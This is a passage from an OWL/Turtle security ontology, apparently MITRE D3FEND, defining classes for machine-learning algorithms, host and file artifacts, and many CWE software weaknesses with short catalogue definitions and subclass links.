[Link](https://en.wikipedia.org/wiki/Ensemble_learning).""" ; rdfs:subClassOf d3f:EnsembleLearning . d3f:BusNetworkNode a owl:Class, owl:NamedIndividual ; rdfs:label "Bus Network Node" ; d3f:connected-to d3f:BusNetwork ; d3f:definition "A device or logical endpoint whose interface is directly connected to a bus and exchanges data over the shared medium using the protocol implemented on that interface." ; d3f:transmits d3f:BusNetworkTraffic ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:connected-to ; owl:someValuesFrom d3f:BusNetwork ], [ a owl:Restriction ; owl:onProperty d3f:transmits ; owl:someValuesFrom d3f:BusNetworkTraffic ], d3f:Host . d3f:BusinessCommunicationPlatformClient a owl:Class ; rdfs:label "Business Communication Platform Client" ; d3f:definition "Client software to enable the process of sharing information between employees within and outside a company. Business communication encompasses topics such as marketing, brand management, customer relations, consumer behavior, advertising, public relations, corporate communication, community engagement, reputation management, interpersonal communication, employee engagement, and event management. It is closely related to the fields of professional communication and technical communication." ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:CollaborativeSoftware . d3f:C4.5 a owl:Class, owl:NamedIndividual ; rdfs:label "C4.5" ; d3f:d3fend-id "D3A-C4." ; d3f:definition "C4.5 is an algorithm that is strongly based off ID3. It creates decision trees the same way as ID3. C4.5 improves on several aspects of ID3, including handling discreet variables, handling training data with missing values, and has the ability to automatically prune the decision trees it creates." ; d3f:kb-article """## References C4.5 algorithm. Wikipedia. [Link](https://en.wikipedia.org/wiki/C4.5_algorithm).""" ; rdfs:subClassOf d3f:DecisionTree . d3f:C5.0 a owl:Class, owl:NamedIndividual ; rdfs:label "C5.0" ; d3f:d3fend-id "D3A-C5." ; d3f:definition "C5.0 is the next version of C4.5, which in turn is the upgrade from ID3. The only difference between C5.0 and C4.5 is some improvements made to C5.0." ; d3f:kb-article """## References C4.5 algorithm. Wikipedia. [Link](https://en.wikipedia.org/wiki/C4.5_algorithm).""" ; rdfs:subClassOf d3f:DecisionTree . d3f:CACertificateFile a owl:Class ; rdfs:label "CA Certificate File" ; d3f:definition "A file containing a digital certificate issued by a certificate authority (CA). Certificate authorities store, issue, and sign digital certificates used as part of the public key infrastructure." ; rdfs:seeAlso , ; rdfs:subClassOf d3f:CertificateFile . d3f:CAPEC-663 a d3f:CommonAttackPattern, owl:Class, owl:NamedIndividual ; rdfs:label "Exploitation of Transient Instruction Execution" ; d3f:capec-id "CAPEC-553" ; rdfs:isDefinedBy ; rdfs:subClassOf d3f:CommonAttackPattern . d3f:CWE-1004 a owl:Class ; rdfs:label "Sensitive Cookie Without 'HttpOnly' Flag" ; d3f:cwe-id "CWE-1004" ; d3f:definition "The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag." ; rdfs:subClassOf d3f:CWE-732 . d3f:CWE-1007 a owl:Class ; rdfs:label "Insufficient Visual Distinction of Homoglyphs Presented to User" ; d3f:cwe-id "CWE-1007" ; d3f:definition "The product displays information or identifiers to a user, but the display mechanism does not make it easy for the user to distinguish between visually similar or identical glyphs (homoglyphs), which may cause the user to misinterpret a glyph and perform an unintended, insecure action." ; d3f:synonym "Homograph Attack" ; rdfs:subClassOf d3f:CWE-451 . d3f:CWE-102 a owl:Class ; rdfs:label "Struts: Duplicate Validation Forms" ; d3f:cwe-id "CWE-102" ; d3f:definition "The product uses multiple validation forms with the same name, which might cause the Struts Validator to validate a form that the programmer does not expect." ; rdfs:subClassOf d3f:CWE-1173, d3f:CWE-694 . d3f:CWE-1021 a owl:Class ; rdfs:label "Improper Restriction of Rendered UI Layers or Frames" ; d3f:cwe-id "CWE-1021" ; d3f:definition "The web application does not restrict or incorrectly restricts frame objects or UI layers that belong to another application or domain, which can lead to user confusion about which interface the user is interacting with." ; d3f:synonym "Clickjacking", "Tapjacking", "UI Redress Attack" ; rdfs:subClassOf d3f:CWE-441, d3f:CWE-451 . d3f:CWE-1022 a owl:Class ; rdfs:label "Use of Web Link to Untrusted Target with window.opener Access" ; d3f:cwe-id "CWE-1022" ; d3f:definition "The web application produces links to untrusted external sites outside of its sphere of control, but it does not properly prevent the external site from modifying security-critical properties of the window.opener object, such as the location property." ; d3f:synonym "tabnabbing" ; rdfs:subClassOf d3f:CWE-266 . d3f:CWE-1024 a owl:Class ; rdfs:label "Comparison of Incompatible Types" ; d3f:cwe-id "CWE-1024" ; d3f:definition "The product performs a comparison between two entities, but the entities are of different, incompatible types that cannot be guaranteed to provide correct results when they are directly compared." ; rdfs:subClassOf d3f:CWE-697 . d3f:CWE-103 a owl:Class ; rdfs:label "Struts: Incomplete validate() Method Definition" ; d3f:cwe-id "CWE-103" ; d3f:definition "The product has a validator form that either does not define a validate() method, or defines a validate() method but does not call super.validate()." ; rdfs:subClassOf d3f:CWE-573 . d3f:CWE-1037 a owl:Class ; rdfs:label "Processor Optimization Removal or Modification of Security-critical Code" ; d3f:cwe-id "CWE-1037" ; d3f:definition "The developer builds a security-critical protection mechanism into the software, but the processor optimizes the execution of the program such that the mechanism is removed or modified." ; rdfs:subClassOf d3f:CWE-1038 . d3f:CWE-1039 a owl:Class ; rdfs:label "Automated Recognition Mechanism with Inadequate Detection or Handling of Adversarial Input Perturbations", "Inadequate Detection or Handling of Adversarial Input Perturbations in Automated Recognition Mechanism" ; d3f:cwe-id "CWE-1039" ; d3f:definition "The product uses an automated mechanism such as machine learning to recognize complex data inputs (e.g. image or audio) as a particular concept or category, but it does not properly detect or handle inputs that have been modified or constructed in a way that causes the mechanism to detect a different, incorrect concept." ; rdfs:subClassOf d3f:CWE-693, d3f:CWE-697 . d3f:CWE-104 a owl:Class ; rdfs:label "Struts: Form Bean Does Not Extend Validation Class" ; d3f:cwe-id "CWE-104" ; d3f:definition "If a form bean does not extend an ActionForm subclass of the Validator framework, it can expose the application to other weaknesses related to insufficient input validation." ; rdfs:subClassOf d3f:CWE-573 . d3f:CWE-1041 a owl:Class ; rdfs:label "Use of Redundant Code" ; d3f:cwe-id "CWE-1041" ; d3f:definition "The product has multiple functions, methods, procedures, macros, etc. that contain the same code." ; rdfs:subClassOf d3f:CWE-710 . d3f:CWE-1042 a owl:Class ; rdfs:label "Static Member Data Element outside of a Singleton Class Element" ; d3f:cwe-id "CWE-1042" ; d3f:definition "The code contains a member element that is declared as static (but not final), in which its parent class element is not a singleton class - that is, a class element that can be used only once in the 'to' association of a Create action." ; rdfs:subClassOf d3f:CWE-1176 . d3f:CWE-1043 a owl:Class ; rdfs:label "Data Element Aggregating an Excessively Large Number of Non-Primitive Elements" ; d3f:cwe-id "CWE-1043" ; d3f:definition "The product uses a data element that has an excessively large number of sub-elements with non-primitive data types such as structures or aggregated objects." ; rdfs:subClassOf d3f:CWE-1093 . d3f:CWE-1044 a owl:Class ; rdfs:label "Architecture with Number of Horizontal Layers Outside of Expected Range" ; d3f:cwe-id "CWE-1044" ; d3f:definition "The product's architecture contains too many - or too few - horizontal layers." ; rdfs:subClassOf d3f:CWE-710 . d3f:CWE-1045 a owl:Class ; rdfs:label "Parent Class with a Virtual Destructor and a Child Class without a Virtual Destructor" ; d3f:cwe-id "CWE-1045" ; d3f:definition "A parent class has a virtual destructor method, but the parent has a child class that does not have a virtual destructor." ; rdfs:subClassOf d3f:CWE-1076 . d3f:CWE-1046 a owl:Class ; rdfs:label "Creation of Immutable Text Using String Concatenation" ; d3f:cwe-id "CWE-1046" ; d3f:definition "The product creates an immutable text string using string concatenation operations." ; rdfs:subClassOf d3f:CWE-1176 . d3f:CWE-1047 a owl:Class ; rdfs:label "Modules with Circular Dependencies" ; d3f:cwe-id "CWE-1047" ; d3f:definition "The product contains modules in which one module has references that cycle back to itself, i.e., there are circular dependencies." ; rdfs:subClassOf d3f:CWE-1120 . d3f:CWE-1048 a owl:Class ; rdfs:label "Invokable Control Element with Large Number of Outward Calls" ; d3f:cwe-id "CWE-1048" ; d3f:definition "The code contains callable control elements that contain an excessively large number of references to other application objects external to the context of the callable, i.e. a Fan-Out value that is excessively large." ; rdfs:subClassOf d3f:CWE-710 . d3f:CWE-1049 a owl:Class ; rdfs:label "Excessive Data Query Operations in a Large Data Table" ; d3f:cwe-id "CWE-1049" ; d3f:definition "The product performs a data query with a large number of joins and sub-queries on a large data table." ; rdfs:subClassOf d3f:CWE-1176 . d3f:CWE-105 a owl:Class ; rdfs:label "Struts: Form Field Without Validator" ; d3f:cwe-id "CWE-105" ; d3f:definition "The product has a form field that is not validated by a corresponding validation form, which can introduce other weaknesses related to insufficient input validation." ; rdfs:subClassOf d3f:CWE-1173 . d3f:CWE-1050 a owl:Class ; rdfs:label "Excessive Platform Resource Consumption within a Loop" ; d3f:cwe-id "CWE-1050" ; d3f:definition "The product has a loop body or loop condition that contains a control element that directly or indirectly consumes platform resources, e.g. messaging, sessions, locks, or file descriptors." ; rdfs:subClassOf d3f:CWE-405 . d3f:CWE-1051 a owl:Class ; rdfs:label "Initialization with Hard-Coded Network Resource Configuration Data" ; d3f:cwe-id "CWE-1051" ; d3f:definition "The product initializes data using hard-coded values that act as network resource identifiers." ; rdfs:subClassOf d3f:CWE-1419, d3f:CWE-665 . d3f:CWE-1052 a owl:Class ; rdfs:label "Excessive Use of Hard-Coded Literals in Initialization" ; d3f:cwe-id "CWE-1052" ; d3f:definition "The product initializes a data element using a hard-coded literal that is not a simple integer or static constant element." ; rdfs:subClassOf d3f:CWE-1419, d3f:CWE-665 . d3f:CWE-1053 a owl:Class ; rdfs:label "Missing Documentation for Design" ; d3f:cwe-id "CWE-1053" ; d3f:definition "The product does not have documentation that represents how it is designed." ; rdfs:subClassOf d3f:CWE-1059 . d3f:CWE-1054 a owl:Class ; rdfs:label "Invocation of a Control Element at an Unnecessarily Deep Horizontal Layer" ; d3f:cwe-id "CWE-1054" ; d3f:definition "The code at one architectural layer invokes code that resides at a deeper layer than the adjacent layer, i.e., the invocation skips at least one layer, and the invoked code is not part of a vertical utility layer that can be referenced from any horizontal layer." ; rdfs:subClassOf d3f:CWE-1061 . d3f:CWE-1055 a owl:Class ; rdfs:label "Multiple Inheritance from Concrete Classes" ; d3f:cwe-id "CWE-1055" ; d3f:definition "The product contains a class with inheritance from more than one concrete class." ; rdfs:subClassOf d3f:CWE-1093 . d3f:CWE-1056 a owl:Class ; rdfs:label "Invokable Control Element with Variadic Parameters" ; d3f:cwe-id "CWE-1056" ; d3f:definition "A named-callable or method control element has a signature that supports a variable (variadic) number of parameters or arguments." ; rdfs:subClassOf d3f:CWE-1120 . d3f:CWE-1057 a owl:Class ; rdfs:label "Data Access Operations Outside of Expected Data Manager Component" ; d3f:cwe-id "CWE-1057" ; d3f:definition "The product uses a dedicated, central data manager component as required by design, but it contains code that performs data-access operations that do not use this data manager." ; rdfs:subClassOf d3f:CWE-1061 . d3f:CWE-1058 a owl:Class ; rdfs:label "Invokable Control Element in Multi-Thread Context with non-Final Static Storable or Member Element" ; d3f:cwe-id "CWE-1058" ; d3f:definition "The code contains a function or method that operates in a multi-threaded environment but owns an unsafe non-final static storable or member data element." ; rdfs:subClassOf d3f:CWE-662 . d3f:CWE-106 a owl:Class ; rdfs:label "Struts: Plug-in Framework not in Use" ; d3f:cwe-id "CWE-106" ; d3f:definition "When an application does not use an input validation framework such as the Struts Validator, there is a greater risk of introducing weaknesses related to insufficient input validation." ; rdfs:subClassOf d3f:CWE-1173 . d3f:CWE-1060 a owl:Class ; rdfs:label "Excessive Number of Inefficient Server-Side Data Accesses" ; d3f:cwe-id "CWE-1060" ; d3f:definition "The product performs too many data queries without using efficient data processing functionality such as stored procedures." ; rdfs:subClassOf d3f:CWE-1120 . d3f:CWE-1062 a owl:Class ; rdfs:label "Parent Class with References to Child Class" ; d3f:cwe-id "CWE-1062" ; d3f:definition "The code has a parent class that contains references to a child class, its methods, or its members." ; rdfs:subClassOf d3f:CWE-1061 . d3f:CWE-1063 a owl:Class ; rdfs:label "Creation of Class Instance within a Static Code Block" ; d3f:cwe-id "CWE-1063" ; d3f:definition "A static code block creates an instance of a class." ; rdfs:subClassOf d3f:CWE-1176 . d3f:CWE-1064 a owl:Class ; rdfs:label "Invokable Control Element with Signature Containing an Excessive Number of Parameters" ; d3f:cwe-id "CWE-1064" ; d3f:definition "The product contains a function, subroutine, or method whose signature has an unnecessarily large number of parameters/arguments." ; rdfs:subClassOf d3f:CWE-1120 . d3f:CWE-1065 a owl:Class ; rdfs:label "Runtime Resource Management Control Element in a Component Built to Run on Application Servers" ; d3f:cwe-id "CWE-1065" ; d3f:definition "The product uses deployed components from application servers, but it also uses low-level functions/methods for management of resources, instead of the API provided by the application server." ; rdfs:subClassOf d3f:CWE-710 . d3f:CWE-1066 a owl:Class ; rdfs:label "Missing Serialization Control Element" ; d3f:cwe-id "CWE-1066" ; d3f:definition "The product contains a serializable data element that does not have an associated serialization method." ; rdfs:subClassOf d3f:CWE-710 . d3f:CWE-1067 a owl:Class ; rdfs:label "Excessive Execution of Sequential Searches of Data Resource" ; d3f:cwe-id "CWE-1067" ; d3f:definition "The product contains a data query against an SQL table or view that is configured in a way that does not utilize an index and may cause sequential searches to be performed." ; rdfs:subClassOf d3f:CWE-1176 . d3f:CWE-1068 a owl:Class ; rdfs:label "Inconsistency Between Implementation and Documented Design" ; d3f:cwe-id "CWE-1068" ; d3f:definition "The implementation of the product is not consistent with the design as described within the relevant documentation." ; rdfs:subClassOf d3f:CWE-710 . d3f:CWE-1069 a owl:Class ; rdfs:label "Empty Exception Block" ; d3f:cwe-id "CWE-1069" ; d3f:definition "An invokable code block contains an exception handling block that does not contain any code, i.e. is empty." ; rdfs:subClassOf d3f:CWE-1071 . d3f:CWE-107 a owl:Class ; rdfs:label "Struts: Unused Validation Form" ; d3f:cwe-id "CWE-107" ; d3f:definition "An unused validation form indicates that validation logic is not up-to-date." ; rdfs:subClassOf d3f:CWE-1164 . d3f:CWE-1070 a owl:Class ; rdfs:label "Serializable Data Element Containing non-Serializable Item Elements" ; d3f:cwe-id "CWE-1070" ; d3f:definition "The product contains a serializable, storable data element such as a field or member, but the data element contains member elements that are not serializable." ; rdfs:subClassOf d3f:CWE-1076, d3f:CWE-710 . d3f:CWE-1072 a owl:Class ; rdfs:label "Data Resource Access without Use of Connection Pooling" ; d3f:cwe-id "CWE-1072" ; d3f:definition "The product accesses a data resource through a database without using a connection pooling capability." ; rdfs:subClassOf d3f:CWE-405 . d3f:CWE-1073 a owl:Class ; rdfs:label "Non-SQL Invokable Control Element with Excessive Number of Data Resource Accesses" ; d3f:cwe-id "CWE-1073" ; d3f:definition "The product contains a client with a function or method that contains a large number of data accesses/queries that are sent through a data manager, i.e., does not use efficient database capabilities." ; rdfs:subClassOf d3f:CWE-405 . d3f:CWE-1074 a owl:Class ; rdfs:label "Class with Excessively Deep Inheritance" ; d3f:cwe-id "CWE-1074" ; d3f:definition "A class has an inheritance level that is too high, i.e., it has a large number of parent classes." ; rdfs:subClassOf d3f:CWE-1093 . d3f:CWE-1075 a owl:Class ; rdfs:label "Unconditional Control Flow Transfer outside of Switch Block" ; d3f:cwe-id "CWE-1075" ; d3f:definition "The product performs unconditional control transfer (such as a \"goto\") in code outside of a branching structure such as a switch block." ; rdfs:subClassOf d3f:CWE-1120 . d3f:CWE-1077 a owl:Class ; rdfs:label "Floating Point Comparison with Incorrect Operator" ; d3f:cwe-id "CWE-1077" ; d3f:definition "The code performs a comparison such as an equality test between two float (floating point) values, but it uses comparison operators that do not account for the possibility of loss of precision." ; rdfs:subClassOf d3f:CWE-697 . d3f:CWE-1079 a owl:Class ; rdfs:label "Parent Class without Virtual Destructor Method" ; d3f:cwe-id "CWE-1079" ; d3f:definition "A parent class contains one or more child classes, but the parent class does not have a virtual destructor method." ; rdfs:subClassOf d3f:CWE-1076 . d3f:CWE-108 a owl:Class ; rdfs:label "Struts: Unvalidated Action Form" ; d3f:cwe-id "CWE-108" ; d3f:definition "Every Action Form must have a corresponding validation form." ; rdfs:subClassOf d3f:CWE-1173 . d3f:CWE-1080 a owl:Class ; rdfs:label "Source Code File with Excessive Number of Lines of Code" ; d3f:cwe-id "CWE-1080" ; d3f:definition "A source code file has too many lines of code." ; rdfs:subClassOf d3f:CWE-1120 . d3f:CWE-1082 a owl:Class ; rdfs:label "Class Instance Self Destruction Control Element" ; d3f:cwe-id "CWE-1082" ; d3f:definition "The code contains a class instance that calls the method or function to delete or destroy itself." ; rdfs:subClassOf d3f:CWE-1076 . d3f:CWE-1083 a owl:Class ; rdfs:label "Data Access from Outside Expected Data Manager Component" ; d3f:cwe-id "CWE-1083" ; d3f:definition "The product is intended to manage data access through a particular data manager component such as a relational or non-SQL database, but it contains code that performs data access operations without using that component." ; rdfs:subClassOf d3f:CWE-1061 . d3f:CWE-1084 a owl:Class ; rdfs:label "Invokable Control Element with Excessive File or Data Access Operations" ; d3f:cwe-id "CWE-1084" ; d3f:definition "A function or method contains too many operations that utilize a data manager or file resource." ; rdfs:subClassOf d3f:CWE-405 . d3f:CWE-1085 a owl:Class ; rdfs:label "Invokable Control Element with Excessive Volume of Commented-out Code" ; d3f:cwe-id "CWE-1085" ; d3f:definition "A function, method, procedure, etc. contains an excessive amount of code that has been commented out within its body." ; rdfs:subClassOf d3f:CWE-1078 . d3f:CWE-1086 a owl:Class ; rdfs:label "Class with Excessive Number of Child Classes" ; d3f:cwe-id "CWE-1086" ; d3f:definition "A class contains an unnecessarily large number of children." ; rdfs:subClassOf d3f:CWE-1093 . d3f:CWE-1087 a owl:Class ; rdfs:label "Class with Virtual Method without a Virtual Destructor" ; d3f:cwe-id "CWE-1087" ; d3f:definition "A class contains a virtual method, but the method does not have an associated virtual destructor." ; rdfs:subClassOf d3f:CWE-1076 . d3f:CWE-1088 a owl:Class ; rdfs:label "Synchronous Access of Remote Resource without Timeout" ; d3f:cwe-id "CWE-1088" ; d3f:definition "The code has a synchronous call to a remote resource, but there is no timeout for the call, or the timeout is set to infinite." ; rdfs:subClassOf d3f:CWE-821 . d3f:CWE-1089 a owl:Class ; rdfs:label "Large Data Table with Excessive Number of Indices" ; d3f:cwe-id "CWE-1089" ; d3f:definition "The product uses a large data table that contains an excessively large number of indices." ; rdfs:subClassOf d3f:CWE-405 . d3f:CWE-109 a owl:Class ; rdfs:label "Struts: Validator Turned Off" ; d3f:cwe-id "CWE-109" ; d3f:definition "Automatic filtering via a Struts bean has been turned off, which disables the Struts Validator and custom validation logic. This exposes the application to other weaknesses related to insufficient input validation." ; rdfs:subClassOf d3f:CWE-1173 . d3f:CWE-1090 a owl:Class ; rdfs:label "Method Containing Access of a Member Element from Another Class" ; d3f:cwe-id "CWE-1090" ; d3f:definition "A method for a class performs an operation that directly accesses a member element from another class." ; rdfs:subClassOf d3f:CWE-1061 . d3f:CWE-1091 a owl:Class ; rdfs:label "Use of Object without Invoking Destructor Method" ; d3f:cwe-id "CWE-1091" ; d3f:definition "The product contains a method that accesses an object but does not later invoke the element's associated finalize/destructor method." ; rdfs:subClassOf d3f:CWE-1076, d3f:CWE-772 . d3f:CWE-1092 a owl:Class ; rdfs:label "Use of Same Invokable Control Element in Multiple Architectural Layers" ; d3f:cwe-id "CWE-1092" ; d3f:definition "The product uses the same control element across multiple architectural layers." ; rdfs:subClassOf d3f:CWE-710 . d3f:CWE-1094 a owl:Class ; rdfs:label "Excessive Index Range Scan for a Data Resource" ; d3f:cwe-id "CWE-1094" ; d3f:definition "The product contains an index range scan for a large data table, but the scan can cover a large number of rows." ; rdfs:subClassOf d3f:CWE-405 . d3f:CWE-1095 a owl:Class ; rdfs:label "Loop Condition Value Update within the Loop" ; d3f:cwe-id "CWE-1095" ; d3f:definition "The product uses a loop with a control flow condition based on a value that is updated within the body of the loop." ; rdfs:subClassOf d3f:CWE-1120 . d3f:CWE-1096 a owl:Class ; rdfs:label "Singleton Class Instance Creation without Proper Locking or Synchronization" ; d3f:cwe-id "CWE-1096" ; d3f:definition "The product implements a Singleton design pattern but does not use appropriate locking or other synchronization mechanism to ensure that the singleton class is only instantiated once." ; rdfs:subClassOf d3f:CWE-820 . d3f:CWE-1097 a owl:Class ; rdfs:label "Persistent Storable Data Element without Associated Comparison Control Element" ; d3f:cwe-id "CWE-1097" ; d3f:definition "The product uses a storable data element that does not have all of the associated functions or methods that are necessary to support comparison." ; rdfs:subClassOf d3f:CWE-1076 . d3f:CWE-1098 a owl:Class ; rdfs:label "Data Element containing Pointer Item without Proper Copy Control Element" ; d3f:cwe-id "CWE-1098" ; d3f:definition "The code contains a data element with a pointer that does not have an associated copy or constructor method." ; rdfs:subClassOf d3f:CWE-1076 . d3f:CWE-1099 a owl:Class ; rdfs:label "Inconsistent Naming Conventions for Identifiers" ; d3f:cwe-id "CWE-1099" ; d3f:definition "The product's code, documentation, or other artifacts do not consistently use the same naming conventions for variables, callables, groups of related callables, I/O capabilities, data types, file names, or similar types of elements." ; rdfs:subClassOf d3f:CWE-1078 . d3f:CWE-11 a owl:Class ; rdfs:label "ASP.NET Misconfiguration: Creating Debug Binary" ; d3f:cwe-id "CWE-11" ; d3f:definition "Debugging messages help attackers learn about the system and plan a form of attack." ; rdfs:subClassOf d3f:CWE-489 . d3f:CWE-110 a owl:Class ; rdfs:label "Struts: Validator Without Form Field" ; d3f:cwe-id "CWE-110" ; d3f:definition "Validation fields that do not appear in forms they are associated with indicate that the validation logic is out of date." ; rdfs:subClassOf d3f:CWE-1164 . d3f:CWE-1100 a owl:Class ; rdfs:label "Insufficient Isolation of System-Dependent Functions" ; d3f:cwe-id "CWE-1100" ; d3f:definition "The product or code does not isolate system-dependent functionality into separate standalone modules." ; rdfs:subClassOf d3f:CWE-1061 . d3f:CWE-1101 a owl:Class ; rdfs:label "Reliance on Runtime Component in Generated Code" ; d3f:cwe-id "CWE-1101" ; d3f:definition "The product uses automatically-generated code that cannot be executed without a specific runtime support component." ; rdfs:subClassOf d3f:CWE-710 . d3f:CWE-1102 a owl:Class ; rdfs:label "Reliance on Machine-Dependent Data Representation" ; d3f:cwe-id "CWE-1102" ; d3f:definition "The code uses a data representation that relies on low-level data representation or constructs that may vary across different processors, physical machines, OSes, or other physical components." ; rdfs:subClassOf d3f:CWE-758 . d3f:CWE-1103 a owl:Class ; rdfs:label "Use of Platform-Dependent Third Party Components" ; d3f:cwe-id "CWE-1103" ; d3f:definition "The product relies on third-party components that do not provide equivalent functionality across all desirable platforms." ; rdfs:subClassOf d3f:CWE-758 . d3f:CWE-1104 a owl:Class ; rdfs:label "Use of Unmaintained Third Party Components" ; d3f:cwe-id "CWE-1104" ; d3f:definition "The product relies on third-party components that are not actively supported or maintained by the original developer or a trusted proxy for the original developer." ; rdfs:subClassOf d3f:CWE-1357 . d3f:CWE-1106 a owl:Class ; rdfs:label "Insufficient Use of Symbolic Constants" ; d3f:cwe-id "CWE-1106" ; d3f:definition "The source code uses literal constants that may need to change or evolve over time, instead of using symbolic constants." ; rdfs:subClassOf d3f:CWE-1078 . d3f:CWE-1107 a owl:Class ; rdfs:label "Insufficient Isolation of Symbolic Constant Definitions" ; d3f:cwe-id "CWE-1107" ; d3f:definition "The source code uses symbolic constants, but it does not sufficiently place the definitions of these constants into a more centralized or isolated location." ; rdfs:subClassOf d3f:CWE-1078 . d3f:CWE-1108 a owl:Class ; rdfs:label "Excessive Reliance on Global Variables" ; d3f:cwe-id "CWE-1108" ; d3f:definition "The code is structured in a way that relies too much on using or setting global variables throughout various points in the code, instead of preserving the associated information in a narrower, more local context." ; rdfs:subClassOf d3f:CWE-1076 . d3f:CWE-1109 a owl:Class ; rdfs:label "Use of Same Variable for Multiple Purposes" ; d3f:cwe-id "CWE-1109" ; d3f:definition "The code contains a callable, block, or other code element in which the same variable is used to control more than one unique task or store more than one instance of data." ; rdfs:subClassOf d3f:CWE-1078 . d3f:CWE-111 a owl:Class ; rdfs:label "Direct Use of Unsafe JNI" ; d3f:cwe-id "CWE-111" ; d3f:definition "When a Java application uses the Java Native Interface (JNI) to call code written in another programming language, it can expose the application to weaknesses in that code, even if those weaknesses cannot occur in Java." ; rdfs:subClassOf d3f:CWE-695 . d3f:CWE-1110 a owl:Class ; rdfs:label "Incomplete Design Documentation" ; d3f:cwe-id "CWE-1110" ; d3f:definition "The product's design documentation does not adequately describe control flow, data flow, system initialization, relationships between tasks, components, rationales, or other important aspects of the design." ; rdfs:subClassOf d3f:CWE-1059 . d3f:CWE-1111 a owl:Class ; rdfs:label "Incomplete I/O Documentation" ; d3f:cwe-id "CWE-1111" ; d3f:definition "The product's documentation does not adequately define inputs, outputs, or system/software interfaces." ; rdfs:subClassOf d3f:CWE-1059 . d3f:CWE-1112 a owl:Class ; rdfs:label "Incomplete Documentation of Program Execution" ; d3f:cwe-id "CWE-1112" ; d3f:definition "The document does not fully define all mechanisms that are used to control or influence how product-specific programs are executed." ; rdfs:subClassOf d3f:CWE-1059 . d3f:CWE-1113 a owl:Class ; rdfs:label "Inappropriate Comment Style" ; d3f:cwe-id "CWE-1113" ; d3f:definition "The source code uses comment styles or formats that are inconsistent or do not follow expected standards for the product." ; rdfs:subClassOf d3f:CWE-1078 . d3f:CWE-1114 a owl:Class ; rdfs:label "Inappropriate Whitespace Style" ; d3f:cwe-id "CWE-1114" ; d3f:definition "The source code contains whitespace that is inconsistent across the code or does not follow expected standards for the product." ; rdfs:subClassOf d3f:CWE-1078 . d3f:CWE-1115 a owl:Class ; rdfs:label "Source Code Element without Standard Prologue" ; d3f:cwe-id "CWE-1115" ; d3f:definition "The source code contains elements such as source files that do not consistently provide a prologue or header that has been standardized for the project." ; rdfs:subClassOf d3f:CWE-1078 . d3f:CWE-1116 a owl:Class ; rdfs:label "Inaccurate Comments" ; d3f:cwe-id "CWE-1116" ; d3f:definition "The source code contains comments that do not accurately describe or explain aspects of the portion of the code with which the comment is associated." ; rdfs:subClassOf d3f:CWE-1078 . d3f:CWE-1117 a owl:Class ; rdfs:label "Callable with Insufficient Behavioral Summary" ; d3f:cwe-id "CWE-1117" ; d3f:definition "The code contains a function or method whose signature and/or associated inline documentation does not sufficiently describe the callable's inputs, outputs, side effects, assumptions, or return codes." ; rdfs:subClassOf d3f:CWE-1078 . d3f:CWE-1118 a owl:Class ; rdfs:label "Insufficient Documentation of Error Handling Techniques" ; d3f:cwe-id "CWE-1118" ; d3f:definition "The documentation does not sufficiently describe the techniques that are used for error handling, exception processing, or similar mechanisms." ; rdfs:subClassOf d3f:CWE-1059 . d3f:CWE-1119 a owl:Class ; rdfs:label "Excessive Use of Unconditional Branching" ; d3f:cwe-id "CWE-1119" ; d3f:definition "The code uses too many unconditional branches (such as \"goto\")." ; rdfs:subClassOf d3f:CWE-1120 . d3f:CWE-112 a owl:Class ; rdfs:label "Missing XML Validation" ; d3f:cwe-id "CWE-112" ; d3f:definition "The product accepts XML from an untrusted source but does not validate the XML against the proper schema." ; rdfs:subClassOf d3f:CWE-1286 . d3f:CWE-1121 a owl:Class ; rdfs:label "Excessive McCabe Cyclomatic Complexity" ; d3f:cwe-id "CWE-1121" ; d3f:definition "The code contains McCabe cyclomatic complexity that exceeds a desirable maximum." ; rdfs:subClassOf d3f:CWE-1120 . d3f:CWE-1122 a owl:Class ; rdfs:label "Excessive Halstead Complexity" ; d3f:cwe-id "CWE-1122" ; d3f:definition "The code is structured in a way that a Halstead complexity measure exceeds a desirable maximum." ; rdfs:subClassOf d3f:CWE-1120 . d3f:CWE-1123 a owl:Class ; rdfs:label "Excessive Use of Self-Modifying Code" ; d3f:cwe-id "CWE-1123" ; d3f:definition "The product uses too much self-modifying code." ; rdfs:subClassOf d3f:CWE-1120 . d3f:CWE-1124 a owl:Class ; rdfs:label "Excessively Deep Nesting" ; d3f:cwe-id "CWE-1124" ; d3f:definition "The code contains a callable or other code grouping in which the nesting / branching is too deep." ; rdfs:subClassOf d3f:CWE-1120 . d3f:CWE-1125 a owl:Class ; rdfs:label "Excessive Attack Surface" ; d3f:cwe-id "CWE-1125" ; d3f:definition "The product has an attack surface whose quantitative measurement exceeds a desirable maximum." ; rdfs:subClassOf d3f:CWE-1120 . d3f:CWE-1126 a owl:Class ; rdfs:label "Declaration of Variable with Unnecessarily Wide Scope" ; d3f:cwe-id "CWE-1126" ; d3f:definition "The source code declares a variable in one scope, but the variable is only used within a narrower scope." ; rdfs:subClassOf d3f:CWE-710 . d3f:CWE-1127 a owl:Class ; rdfs:label "Compilation with Insufficient Warnings or Errors" ; d3f:cwe-id "CWE-1127" ; d3f:definition "The code is compiled without sufficient warnings enabled, which may prevent the detection of subtle bugs or quality issues." ; rdfs:subClassOf d3f:CWE-710 . d3f:CWE-113 a owl:Class ; rdfs:label "Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')" ; d3f:cwe-id "CWE-113" ; d3f:definition "The product receives data from an HTTP agent/component (e.g., web server, proxy, browser, etc.), but it does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers." ; d3f:synonym "HTTP Request Splitting", "HTTP Response Splitting" ; rdfs:subClassOf d3f:CWE-436, d3f:CWE-93 . d3f:CWE-114 a owl:Class ; rdfs:label "Process Control" ; d3f:cwe-id "CWE-114" ; d3f:definition "Executing commands or loading libraries from an untrusted source or in an untrusted environment can cause an application to execute malicious commands (and payloads) on behalf of an attacker." ; rdfs:subClassOf d3f:CWE-73 . d3f:CWE-115 a owl:Class ; rdfs:label "Misinterpretation of Input" ; d3f:cwe-id "CWE-115" ; d3f:definition "The product misinterprets an input, whether from an attacker or another product, in a security-relevant fashion." ; rdfs:subClassOf d3f:CWE-436 . d3f:CWE-117 a owl:Class ; rdfs:label "Improper Output Neutralization for Logs" ; d3f:cwe-id "CWE-117" ; d3f:definition "The product constructs a log message from external input, but it does not neutralize or incorrectly neutralizes special elements when the message is written to a log file." ; d3f:synonym "Log forging" ; rdfs:subClassOf d3f:CWE-116 . d3f:CWE-1174 a 